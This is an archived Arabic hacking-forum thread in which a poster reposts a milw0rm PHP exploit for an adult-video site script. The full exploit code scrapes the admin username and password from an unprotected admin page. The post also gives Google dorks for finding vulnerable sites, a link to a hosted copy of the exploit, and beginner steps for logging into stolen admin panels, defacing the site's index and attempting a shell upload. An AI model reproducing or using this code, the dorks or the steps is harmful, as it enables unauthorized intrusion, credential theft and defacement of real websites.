المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثغره حيلوه وقويه هع هع



جندي اول للهكر
11-14-2009, 04:02 PM
imzourencity+imatawen
عزيز الزائر نعتدر عن الازعاج ** تبين لنا انك لم تقم بتسجيل الدخول نرجو منك التعريف بنفسك .. ان لم تكن مسجلا فالرجاء التسجيل لتنضم الى اسرتنا وشكرا





امزورن سيتي مدينة الترفيه لشباب 2009
**سؤال البحث

نتائج البحث عدد المساهمات مواضيع

--------------------------------------------------------------------------------
بحث متقدم

****

imzourencity+imatawen :: امتاون امزورن سيتي :: مواضيع قديمة شاطر | المزيد!

المزيد!
استعرض المواضيع الجديدة منذ آخر زيارة لي
استعرض مُساهماتك
استعراض المواضيع التي لم يتم الرد عليها
المواضيع المراقبة
--------------------------------------------------------------------------------
أضف إلى المفضلة
ارسل إلى صديق(ة)
قم بنسخ عنوان ال BBCode للصفحة
طبع هذه الصفحة

حصريا شـرح ثغرة لاختراق سكربت مواقع جنسية للمبتدئين Adult ****** Unauthorized Admin

كاتب الموضوع رسالة
كخعتضاهيث
فريق هكر ايمتاون



عدد الرسائل: 174
:
السٌّمعَة: 0
تاريخ التسجيل: 21/04/2008

موضوع: حصريا شـرح ثغرة لاختراق سكربت مواقع جنسية للمبتدئين Adult ****** Unauthorized Admin الإثنين أغسطس 25, 2008 10:06 pm

--------------------------------------------------------------------------------

بــــــــــــــــــــــــ ــــسم الله الـــــــــــــــرحــــــ مـــــن الــــــــــــــرحـــــــ ـيــــــــــــــــم

الحمد لله الذي جعلنا مسلمين واللهم صل و سلم على سيدنا محمد و على آله و صحبه أجمعين و من

تبعهم بإحسان إلى يوم الدين آمين

السلام عليكم و رحمة الله و بركاته أهل بيت الهكر

اليوم باذن الله سنقوم بشرح ثغرة جديدة نزلت تقريبا في جميع مواقع السكيوريتي بتاريخ 2007-12-13

اسم الثغرة هو

Adult ****** Unauthorized Administrative Access Exploit

و الثغرة مكتوبة بلغة PHP

و هذه الثغرة تخص سكربت معين الغرض منه بالتحديد انه يستعمل في المواقع الاباحية التي تعرض

الفيديوهات

نشوف رابط الثغرة معا في موقع الميل ورم

Adult Script <= 1.6 Unauthorized Administrative Access Exploit (http://www.milw0rm.com/exploits/4731)
كود PHP:
( ($_SESSION['adminid']=="") && ($_SESSION['admintype'] !=1))
{
header("********: logout.php"); // Bypass Me :D
}
</pre>
<br>
<b>Dork</b>:<br>
inurl:submit-user-link.html<br>
inurl:video-listing-cat<br>
inurl:hosted-videos<br>
inurl:porn-listing-cat<br>
"Powered By Adult******.NET"<br>
"Copyright 2007 [IAG].Adult******.v1.5.Nulled"<br>
<br>
<form method="POST" action="">
<input name="adres" type="text" value="Target example: http://www.site.com/" size="70" onFocus="if(this.value=='Target example: http://www.site.com/')this.value=''" onBlur="if(this.value=='')this.value='Target example: http://www.site.com/'">
<input name="yolla" type="submit" value="Send">
</form>

<br>
<?php
function dosya_indir($liz0){


$ch = curl_init();
$timeout = 0;
curl_setopt ($ch, CURLOPT_URL, $liz0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$veri = curl_exec($ch);
curl_close($ch);

return $veri;

}

$desen='|value="(.*)"|';

if($_POST[yolla])
{
$adres=$_POST[adres];

if(!eregi("http",$adres))
{
$adres="http://".$adres;
}
if($adres=="") { echo 'Boş Yerleri Doldurun'; exit(); }
echo 'Target= '.htmlspecialchars($adres)."<br>";
sleep(1);
echo 'Sending Evil Code.......<br>';
$kaynak=dosya_indir($adres."/admin/administrator.php");
sleep(5);

if(eregi('value="',$kaynak)) {
echo "Exploit Has Been Succeful <br>";
preg_match_all($desen,$kaynak,$sonuc);
echo "<a target='_blank' href='".$adres."/admin/'>".$adres."/admin/</a><br>";
echo "<b>Username</b> :".htmlspecialchars($sonuc[1][0])."<br>";
echo "<b>Password</b>:".htmlspecialchars($sonuc[1][1])."<br>";
echo $adres."/admin/videolinks_view.php edit video and upload ****l ";
}
else
{
echo "Exploit Has Been Failed! <br>";
}


}
?>

# milw0rm.com [2007-12-13]


جيد الان سنتعلم كيف يتم استغلال هذا النوع من الثغرات

الاستغلال يكون كالتالي تقوم بنسخ كود الثغرة كاملا ثم تنسخه بالمفكرة و تقوم بتسميته ثم تحفظ الملف

بامتداد PHP و ترفعه الى موقعك اى لازم اولا يكون عندك مساحة خاصة بك


قمت برفع الملف على مساحة مجانية بـــ ripway لكن الثغرة لم تشتغل لكن انا لم اجرب على موقع

lycos فممكن أن تنجح اذن فما الحل |5|

لازم يكون عندك استضافة مدفوعة لكى يشتغل السكربت تمام

طيب انت تقول انا ما عندي أنا اقولك ولا يهمك وجدت باحد المنتديات التركية الرابط جـــــــــاهز زي

العسل |11|


و هذا رابط الثغرة و قمت بتجربته و هو شغال تمام

http://www.r57.li/adult.php


طيب الان نبدأ بشرح كيفية التعامل مع السكربت و جلب معلومات الادمن |ok|

وهي زبدة الموضوع |7|

تابع الشرح كما في الصورة

This image has been resized. Click this bar to view the full image. The original image is sized 701x503.


كما نلاحظ بالصورة كل شئ وا ضح كما نرى ان السكريت سهل جدا و كل شئ موضح امامك في

السكربت نفسه الان وش تعمل الخطوة الثانية هي البحث عن مواقع مصابة و ذلك باستعمال الدورك في

محرك البحث قوقــــــــــــل شوف الصورة



انا اخترت الدورك الثاني على سبيل المثال لا الحصر انت حر في اختيار ايها شئت |7|

Google (http://www.google.com)


تضع الدورك في محرك البحث و تضغط بحث تابع الصورة

This image has been resized. Click this bar to view the full image. The original image is sized 800x600.

ستلاحظ ظهور نتائج البحث و المواقع المصابة كثيرة و انت كل مرة استعمل دورك مختلف كي توسع

مجال البحث ...مثلا انا اخترت احد المواقع تابع الصورة

This image has been resized. Click this bar to view the full image. The original image is sized 800x600.

الان تروح لرابط السكربت و تبدأ بالعمل بعد ما تختار احد المواقع و بامكانك ان تجرب على الكل واحد

واحد تابع الصورة

This image has been resized. Click this bar to view the full image. The original image is sized 800x717.

الان طبق كما هو موضح في الصورة

كما تلاحظون عند انتهاء العملية و بعد ظهور معلومات الادمن كاتب الثغرة يقول انه بالامكان رفع شل

في الرابط المبين ادناه upload ****l انا جربت ارفع شل على شكل صورة لكن ما نجحت الطريقة

معي و هذه اتركها للمحترفيين ان شاء الله يجدون لها حل |7|

طيب انت طبقت خلاص و جبت اسم و كلمة سر الادمن الان تذهب الى رابط الدخول الى لوحة التحكم

تابع الصورة

This image has been resized. Click this bar to view the full image. The original image is sized 800x533.

بعد وضع اسم و كلمة المرور سيتم نقلك الى لو حة تحكم الادمن تابع الصورة


This image has been resized. Click this bar to view the full image. The original image is sized 800x600.

الان ننتقل الى الخطوة الاخيرة و هي تنفيذ الهجوم رفع الاندكس تابع الصورة

This image has been resized. Click this bar to view the full image. The original image is sized 800x600.

بعد رفع الاكواد الخاصة بصفحة اختراقك او كود التحويل لا تنسى شئ مهم تابع الصورة

This image has been resized. Click this bar to view the full image. The original image is sized 732x341.


مبـــــــــــــــــروك الان تم الاختراق اذهب الى الصفحة الرئيسية و شاهد الاختراق

لآى استفسارات أو أسئلة |1| فأنا جاهز ان شاء الله

تـــــــــــم بحمد الله

هذا وما كان من توفيق فمن الله وحده, وما كان من خطأ أو سهو أو زلل أو نسيان فمني ومن الشيطان

وأعوذ بالله أن أذكركم به وأنساه.

Dz V!Rus
11-16-2009, 09:03 PM
الشرح منقول أخي

+

الصور لا تظهر

Dz V!Rus
11-16-2009, 09:04 PM
الشرح منقول أخي

+

الصور لا تظهر

mohned
01-04-2010, 02:15 AM
اخي ماهو كود الاستغلال لاهنت

احمد المصراوى
04-12-2010, 02:28 AM
شكرا جندى على التوبك الجميل

ASDELY-ScOrPiOn
04-12-2010, 12:20 PM
ايش هذه المسخره ؟؟!!!!

الموضوع يــــغـــلـــق